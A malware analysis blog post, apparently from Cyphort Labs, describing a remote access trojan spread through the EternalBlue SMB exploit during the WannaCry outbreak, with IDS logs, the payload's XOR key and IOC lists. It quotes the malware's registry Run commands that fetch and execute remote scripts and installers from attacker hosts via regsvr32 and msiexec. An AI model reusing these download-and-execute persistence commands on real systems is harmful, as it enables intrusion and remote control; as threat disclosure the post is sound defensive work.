During the WannaCry pandemic attack, Cyphort Labs discovered that other threat actors have been using the same EternalBlue exploit to deliver other malware. This malware is not a ransomware and is not a bitcoin miner either as others have reported. This one is a remote access trojan typically used to spy on people’s activities or take control of their computers for whatever end the attacker wants to reach.

On May 12, at the onset of the WannaCry attack, Cyphort Labs researchers have seen a similar SMB attack to one of our honeypot servers. Later on, we found evidence of the same attack perpetrated on May 3.

Network capture of the SMB exploit

 

It was very much the EternalBlue exploit based on the ET rule hits below:

05/12/2017-17:27:19.766291  [**] [1:2024217:2] ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445

05/12/2017-17:27:20.225752  [**] [1:2024217:2] ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445

05/12/2017-17:27:20.652098  [**] [1:2024218:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768

05/12/2017-17:27:26.772666  [**] [1:2024218:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768

 

We initially thought this is WannaCry, but upon further investigation, we discovered a stealthier Remote Access Trojan. Unlike wannaCry, this threat infects only once and does not spread. It is not a worm.

Payload

Based the pcap, the attacking IP is 182.18.23.38. This IP is located in China.

Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:

 

File Properties of the Embedded DLL

MD5: B6B68FAA706F7740DAFD8941C4C5E35A

SHA1: 806027DB01B4997F71AEFDE8A5DBEE5B8D9DBE98

Time Stamp: Sat Apr 29 09:57:21 2017

Debugging Symbols Path: d:\down10\release\down10.pdb

Exports: DllMain, test, InWMI

 

The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller. It waits for the following commands:

  • [down]
  • [cmd]

 

The commands are downloaded  from “http://down[.]mysking.info:8888/ok.txt

 

 

The [down] command instructs the malware to download from a link and save it as the second parameter. Here, it will download “http://23.27.127.254:8888/close.bat” and save it as c:\windows\debug\c.bat

The [cmd] command is followed by a series of commands that the malware will execute.

 

Based on the commands above, it will try to delete the following users:

 

  • Asps.xnet
  • IISUSER_ACCOUNTXX
  • IUSR_ADMIN
  • snt0454
  • Asp.net
  • aspnet

 

It will terminate and/or delete the following Files or Processes

  • c:\windows\Logo1_.exe
  • c:\windows\dell\Update64.exe
  • Misiai.exe
  • c:\windows\RichDllt.dll
  • C:\windows\winhost.exe
  • C:\windows\ygwmgo.exe
  • c:\windows\netcore.exe

 

It creates a job file “Mysa” that would download a file a.exe via FTP from down.mysking.info.

 

It sets the following Registry Run entries to download and execute additional malware.

  • reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
  • reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f

 

Then it will execute c.bat and execute another DLL file item.dat:

  • rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

 

In addition, it connects to http://wmi[.]mykings.top:8888/kill.html to obtain a checklist of processes to terminate.

 

2nd Stage Payload: Item.dat

 

We were not able to capture item.dat from our own server. This file is saved as C:\Windows\debug\item.dat and the [cmd] command expects it to be there. We believe that this is the second stage payload. We researched Virustotal for such files and found this hash:

 

 

Virustotal has seen this malware to be downloaded from the following links

 

  • http://67[.]229.144.218:8888/test1.dat
  • http://47[.]88.216.68:8888/test.dat
  • http://47[.]52.0.176:8888/item.dat
  • http://118[.]190.50.141:8888/test.dat

 

This means the actors used those above IPs for their activities. It also appears to affect multiple regions based from the Virustotal submission sources.

This sample was first seen on Virustotal on April 2, 2017. And since then, we have seen 12 other similar samples on VT:

 

0108036951155a66879491ffc499cdb1e451e9ade58d62521a49a07aa4c79b74

25db9243e3fb0b18a8847c001b05c02b3cc686752a2e4ae28c4678d513b48e6f

b899ba1e426b838dd75d541cfe48d08a49453fb901e2808a15bbb44e08983d68

19fce399808befd7dfe92a0ab7cd006357f0d3a8a519a14953a3d217cca8ae48

557b13d6562b780612d932a6c0513acd8316885357b70ba5a8aedbbaa83668a9

56a35e6de83b7a6e9ecb731a5a636e91ab32899eb90fbec24c8f4d40467ca5d9

ec7fd8909baaf79077368dd113294c43e7269b323473e8825e73f64e2f71d0af

ceef5ea176716e225cc2389f0629b4d1ae3edb83c490c70f415c51a1b5118c19

05104184573f666dbf000c8150fc17c186e98de2c33f4177a406d125af751388

4d5cf13167537ce422ad0fe00f60ac523defde5ad0304a1d04eed77e9d590df0

ed5e704c63d5ec60adba8b5b56147f5c92f236b5410aff7246e8dab89961a51b

cf3cd50f7ce87d2a83ccda680a2bd82a45d62714432820cd0a5d7d784f08e147

 

This is an indication that they might have been using the EternalBlue exploit well before the WannaCry outbreak on May 12, 2017.

 

The sample is protected by Safengine Shielden packer.

 

Packer Protector of item.dat

 

 

Based on the following dump, this sample appears to be a RAT that gives the attacker access and control of the infected machine.

Memory Dump of running item.dat

Based from the strings above, we found the following program, ForShare 8.28 having similarites. The program is hosted on a Chinese website.

 

  • http://en.pudn.com/downloads758/sourcecode/windows/detail3014472_en.html
  • http://www.codeforge.cn/read/287854/MyClientTran.cpp__html

 

ForShare 8.28 GUI found on the web

Based on the source code, we confirmed that the malware is using a version of this ForShare Remote Access Tool. The RAT has lots of spy features and among them are as follows:

  • Receive and execute commands from server
  • Screen Monitoring
  • Audio and Video Surveillance
  • Monitor Keyboard
  • File and Data Transfer
  • Delete Files
  • Terminate Processes
  • Execute Files
  • Enumerate Files and Processes
  • Download Files
  • Control the machine

 

Below is a snippet of the commands of this RAT.

 

 

Close.bat

One interesting act the malware did is it closed the port 445 by executing close.bat. Close.bat or c.bat contains the following code:

 

 

This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it. The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February.  We found similarities in terms of their IOCs.

 

Conclusion

 

WannaCry ransomware delivered a strong message to the world by being noisy and destructive. It seems that the message is clear now; that there are many systems out there that are vulnerable to Cyberattacks. At first glance, the threat we discovered may not appear to be as destructive as the WannaCry ransomware,  but it may be equally dangerous if not more, depending on the attacker’s intent. The main payload is a RAT and we all know what can happen once a malicious hacker gets inside your enterprise. In addition, if WannaCry did not happen, we may not be aware of a number of systems that are vulnerable to exploits whether they are zero-day, disclosed or undisclosed, and that makes this type of stealthy threat more dangerous. What will hurt you the most are those things that you did not see coming.

 

Special thanks to Joe Dela Cruz,  Alex Burt, Abhijit Mohanta and the rest of the Cyphort Labs for their help in analysis and discovery of this threat.

Indicators of Compromise

 

Files

C:\Windows\debug\c.bat

C:\Windows\debug\item.dat

 

SHA256

E6fc79a24d40aea81afdc7886a05f008385661a518422b22873d34496c3fb36b

0108036951155a66879491ffc499cdb1e451e9ade58d62521a49a07aa4c79b74

25db9243e3fb0b18a8847c001b05c02b3cc686752a2e4ae28c4678d513b48e6f

b899ba1e426b838dd75d541cfe48d08a49453fb901e2808a15bbb44e08983d68

19fce399808befd7dfe92a0ab7cd006357f0d3a8a519a14953a3d217cca8ae48

557b13d6562b780612d932a6c0513acd8316885357b70ba5a8aedbbaa83668a9

56a35e6de83b7a6e9ecb731a5a636e91ab32899eb90fbec24c8f4d40467ca5d9

ec7fd8909baaf79077368dd113294c43e7269b323473e8825e73f64e2f71d0af

ceef5ea176716e225cc2389f0629b4d1ae3edb83c490c70f415c51a1b5118c19

05104184573f666dbf000c8150fc17c186e98de2c33f4177a406d125af751388

4d5cf13167537ce422ad0fe00f60ac523defde5ad0304a1d04eed77e9d590df0

ed5e704c63d5ec60adba8b5b56147f5c92f236b5410aff7246e8dab89961a51b

cf3cd50f7ce87d2a83ccda680a2bd82a45d62714432820cd0a5d7d784f08e147

 

IP, URLs, and Domains

182.18.23.38

Js.mykings.top

Down.mysking.info

Wmi.mykings.top

23.27.127.254

118.190.50.141

47.52.0.176

47.88.216.68

67.229.144.218

http://67.229.144.218:8888/test1.dat

http://47.88.216.68:8888/test.dat

http://47.52.0.176:8888/item.dat

http://118.190.50.141:8888/test.dat

http://down.mysking.info:8888/ok.txt

http://wmi.mykings.top:8888/kill.html

http://23.27.127.254:8888/close.bat

http://js.mykings.top:280/v.sct

http://js.mykings.top:280/helloworld.msi

scdc.worra.com